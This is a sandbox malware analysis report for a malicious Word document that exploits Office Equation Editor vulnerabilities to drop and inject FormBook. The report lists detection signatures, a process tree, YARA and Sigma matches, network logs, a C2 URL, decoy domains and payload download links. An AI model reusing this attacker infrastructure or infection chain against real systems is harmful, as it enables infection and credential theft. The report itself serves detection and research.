Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order-1351125X.docx.doc

Overview

General Information

Sample name:Order-1351125X.docx.doc
Analysis ID:1462365
MD5:e86424648b277754b74e507d51878e71
SHA1:e86498df0eb2a8514e0d55f9a33148779bf5b66d
SHA256:3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0
Tags:CVE-2017-0199docFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2732 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3156 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • nelb82019.scr (PID: 3216 cmdline: "C:\Users\user\AppData\Roaming\nelb82019.scr" MD5: 607868824F841FF4B6E24E997228D10D)
        • nelb82019.scr (PID: 3248 cmdline: "C:\Users\user\AppData\Roaming\nelb82019.scr" MD5: 607868824F841FF4B6E24E997228D10D)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wlanext.exe (PID: 3372 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
              • cmd.exe (PID: 3444 cmdline: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cnoszirzbkaqz.com/btrd/"], "decoy": ["everslane.com", "prairieviewelectric.online", "dszvhgd.com", "papamuch.com", "8129k.vip", "jeffreestar.gold", "bestguestrentals.com", "nvzhuang1.net", "anangtoto.com", "yxfgor.top", "practicalpoppers.com", "thebestanglephotography.online", "koormm.top", "criika.net", "audioflow.online", "380747.net", "jiuguanwang.net", "bloxequities.com", "v321c.com", "sugar.monster", "agriwithai.com", "rd8.online", "texanboxes.com", "h7wlvwr4afx.top", "furryfriendsupply.store", "xmentorgroup.com", "runccl.com", "fairplaytavern.com", "concretecountertopsolutios.com", "wzxq.xyz", "outletivo.com", "studyasp.net", "pure1027.com", "xpffvn.cfd", "liposuctionclinics2.today", "rouchoug.top", "rifasgados.com", "tesourosobrerodas.site", "1stclasstv.net", "invest247on.com", "watch2movie.xyz", "martline.website", "naddafornadda.com", "drbtcbtc.com", "turbrun.com", "autounion999370.top", "wirewizardselectric.net", "0757hunyin.net", "researchforhighschool.com", "thedivorcesurvivalguide.com", "emeraldsurrogatefabric.com", "home-repair-contractors-kfm.xyz", "onlynaturlpt.shop", "agiletzal.site", "dylanmoranrules.com", "ngbbvuhkm5.asia", "proveedorafrac.com", "pho3nixkidsghana.com", "greatfightcompany.com", "hotnerdsg.com", "thecolourgrey.com", "librarylatte.com", "videomademagic.com", "coinrun.net"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2b6e9:$obj1: \objhtml
  • 0x2b70e:$obj2: \objdata
  • 0x2b724:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2b6e9:$obj1: \objhtml
  • 0x2b70e:$obj2: \objdata
  • 0x2b724:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18829:$sqlite3step: 68 34 1C 7B E1
      • 0x1893c:$sqlite3step: 68 34 1C 7B E1
      • 0x18858:$sqlite3text: 68 38 2A 90 C5
      • 0x1897d:$sqlite3text: 68 38 2A 90 C5
      • 0x1886b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18993:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.nelb82019.scr.860000.1.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0x5866b:$x1: In$J$ct0r
      10.2.nelb82019.scr.32a5770.5.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0x5686b:$x1: In$J$ct0r
      10.2.nelb82019.scr.2296f6c.4.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0xa48e4:$x1: In$J$ct0r
      • 0xa5830:$a1: WriteProcessMemory
      • 0xa58bc:$a1: WriteProcessMemory
      • 0xa5990:$a4: VirtualAllocEx
      • 0xa5bb4:$a4: VirtualAllocEx
      • 0xa5c34:$a4: VirtualAllocEx
      10.2.nelb82019.scr.860000.1.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0x5686b:$x1: In$J$ct0r
      10.2.nelb82019.scr.22997ac.3.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
      • 0xa20a4:$x1: In$J$ct0r
      • 0xa2ff0:$a1: WriteProcessMemory
      • 0xa307c:$a1: WriteProcessMemory
      • 0xa3150:$a4: VirtualAllocEx
      • 0xa3374:$a4: VirtualAllocEx
      • 0xa33f4:$a4: VirtualAllocEx
      Click to see the 6 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Equation Editor Network Connection
      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3156, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
      Sigma detected: Suspicious Microsoft Office Child Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine: "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\nelb82019.scr, NewProcessName: C:\Users\user\AppData\Roaming\nelb82019.scr, OriginalFileName: C:\Users\user\AppData\Roaming\nelb82019.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3156, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\nelb82019.scr", ProcessId: 3216, ProcessName: nelb82019.scr
      Sigma detected: SCR File Write Event
      Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3156, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr
      Sigma detected: Suspicious Office Outbound Connections
      Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 2732, Protocol: tcp, SourceIp: 172.67.162.95, SourceIsIpv6: false, SourcePort: 443
      Sigma detected: Suspicious Screensaver Binary File Creation
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3156, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr
      Sigma detected: Unusual Parent Process For Cmd.EXE
      Source: Process startedAuthor: Tim Rauch: Data: Command: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 3372, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr", ProcessId: 3444, ProcessName: cmd.exe
      Sigma detected: Modification of IE Registry Settings
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2732, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Sigma detected: Office Macro File Creation
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

      Snort Signatures

      Timestamp:06/25/24-15:16:55.778410
      SID:2031412
      Source Port:49180
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:17:56.714740
      SID:2031412
      Source Port:49183
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:18:15.693590
      SID:2031412
      Source Port:49184
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:14:54.227212
      SID:2031412
      Source Port:49177
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:15:34.385117
      SID:2031412
      Source Port:49178
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:17:35.364789
      SID:2031412
      Source Port:49182
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:14:32.532373
      SID:2031412
      Source Port:49176
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:15:55.182689
      SID:2031412
      Source Port:49179
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:06/25/24-15:17:16.459709
      SID:2031412
      Source Port:49181
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.comAvira URL Cloud: Label: malware
      Source: https://universalmovies.top/nelb.scrjAvira URL Cloud: Label: phishing
      Source: https://universalmovies.top/nelb.scrAvira URL Cloud: Label: malware
      Source: http://www.cnoszirzbkaqz.com/btrd/Avira URL Cloud: Label: malware
      Source: http://www.outletivo.com/btrd/www.380747.netAvira URL Cloud: Label: malware
      Source: http://www.outletivo.com/btrd/Avira URL Cloud: Label: malware
      Source: https://universalmovies.top/nelb.scrllAvira URL Cloud: Label: phishing
      Source: http://www.outletivo.com/btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-voAvira URL Cloud: Label: malware
      Source: http://www.cnoszirzbkaqz.com/btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-voAvira URL Cloud: Label: malware
      Source: https://universalmovies.top/nelb.docAvira URL Cloud: Label: phishing
      Source: http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asiaAvira URL Cloud: Label: malware
      Source: http://www.outletivo.comAvira URL Cloud: Label: malware
      Source: https://universalmovies.top/nelb.scrulaAvira URL Cloud: Label: phishing
      Source: http://www.agriwithai.com/btrd/Avira URL Cloud: Label: malware
      Source: www.cnoszirzbkaqz.com/btrd/Avira URL Cloud: Label: malware
      Source: https://universalmovies.top/Avira URL Cloud: Label: phishing
      Source: https://universalmovies.top/nelb.scriiC:Avira URL Cloud: Label: phishing
      Source: http://www.cnoszirzbkaqz.comAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
      Found malware configuration
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cnoszirzbkaqz.com/btrd/"], "decoy": ["everslane.com", "prairieviewelectric.online", "dszvhgd.com", "papamuch.com", "8129k.vip", "jeffreestar.gold", "bestguestrentals.com", "nvzhuang1.net", "anangtoto.com", "yxfgor.top", "practicalpoppers.com", "thebestanglephotography.online", "koormm.top", "criika.net", "audioflow.online", "380747.net", "jiuguanwang.net", "bloxequities.com", "v321c.com", "sugar.monster", "agriwithai.com", "rd8.online", "texanboxes.com", "h7wlvwr4afx.top", "furryfriendsupply.store", "xmentorgroup.com", "runccl.com", "fairplaytavern.com", "concretecountertopsolutios.com", "wzxq.xyz", "outletivo.com", "studyasp.net", "pure1027.com", "xpffvn.cfd", "liposuctionclinics2.today", "rouchoug.top", "rifasgados.com", "tesourosobrerodas.site", "1stclasstv.net", "invest247on.com", "watch2movie.xyz", "martline.website", "naddafornadda.com", "drbtcbtc.com", "turbrun.com", "autounion999370.top", "wirewizardselectric.net", "0757hunyin.net", "researchforhighschool.com", "thedivorcesurvivalguide.com", "emeraldsurrogatefabric.com", "home-repair-contractors-kfm.xyz", "onlynaturlpt.shop", "agiletzal.site", "dylanmoranrules.com", "ngbbvuhkm5.asia", "proveedorafrac.com", "pho3nixkidsghana.com", "greatfightcompany.com", "hotnerdsg.com", "thecolourgrey.com", "librarylatte.com", "videomademagic.com", "coinrun.net"]}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scrReversingLabs: Detection: 36%
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrReversingLabs: Detection: 36%
      Multi AV Scanner detection for submitted file
      Source: Order-1351125X.docx.docReversingLabs: Detection: 31%
      Yara detected FormBook
      Source: Yara matchFile source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scrJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrJoe Sandbox ML: detected
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C07AD0 GetLastError,CryptUnprotectData,CryptUnprotectData,GetLastError,CryptUnprotectData,GetLastError,CryptProtectData,CryptProtectData,GetLastError,CryptProtectData,GetLastError,RpcImpersonateClient,LocalFree,LocalFree,LocalFree,14_2_00C07AD0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0C953 GetLastError,CryptProtectData,14_2_00C0C953

      Exploits

      barindex
      Office equation editor establishes network connection
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.74.191 Port: 443Jump to behavior
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\nelb82019.scr
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\nelb82019.scrJump to behavior
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.drStream path '_1780811987/\x1CompObj' : ...................F....Microsoft Equation 3.0....
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49167 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49169 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49170 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49173 version: TLS 1.2
      Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: nelb82019.scr, 0000000A.00000002.400627339.0000000000400000.00000004.08000000.00040000.00000000.sdmp, nelb82019.scr, 0000000A.00000002.403235071.0000000002241000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: nelb82019.scr, nelb82019.scr, 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923627309.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.410817092.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.411178144.0000000000A40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wlanext.pdb source: nelb82019.scr, 0000000B.00000002.410869004.0000000000544000.00000004.00000020.00020000.00000000.sdmp, nelb82019.scr, 0000000B.00000002.410776116.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: universalmovies.top
      Source: global trafficDNS query: name: www.onlynaturlpt.shop
      Source: global trafficDNS query: name: www.wirewizardselectric.net
      Source: global trafficDNS query: name: www.cnoszirzbkaqz.com
      Source: global trafficDNS query: name: www.cnoszirzbkaqz.com
      Source: global trafficDNS query: name: www.naddafornadda.com
      Source: global trafficDNS query: name: www.turbrun.com
      Source: global trafficDNS query: name: www.wzxq.xyz
      Source: global trafficDNS query: name: www.texanboxes.com
      Source: global trafficDNS query: name: www.outletivo.com
      Source: global trafficDNS query: name: www.380747.net
      Source: global trafficDNS query: name: www.emeraldsurrogatefabric.com
      Source: global trafficDNS query: name: www.emeraldsurrogatefabric.com
      Source: global trafficDNS query: name: www.furryfriendsupply.store
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 104.21.89.47:80
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 15.197.148.33:80
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 167.172.228.26:80
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 15.197.148.33:80
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 3.33.130.190:80
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 5.149.161.103:80
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 156.241.141.214:80
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 192.243.61.227:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
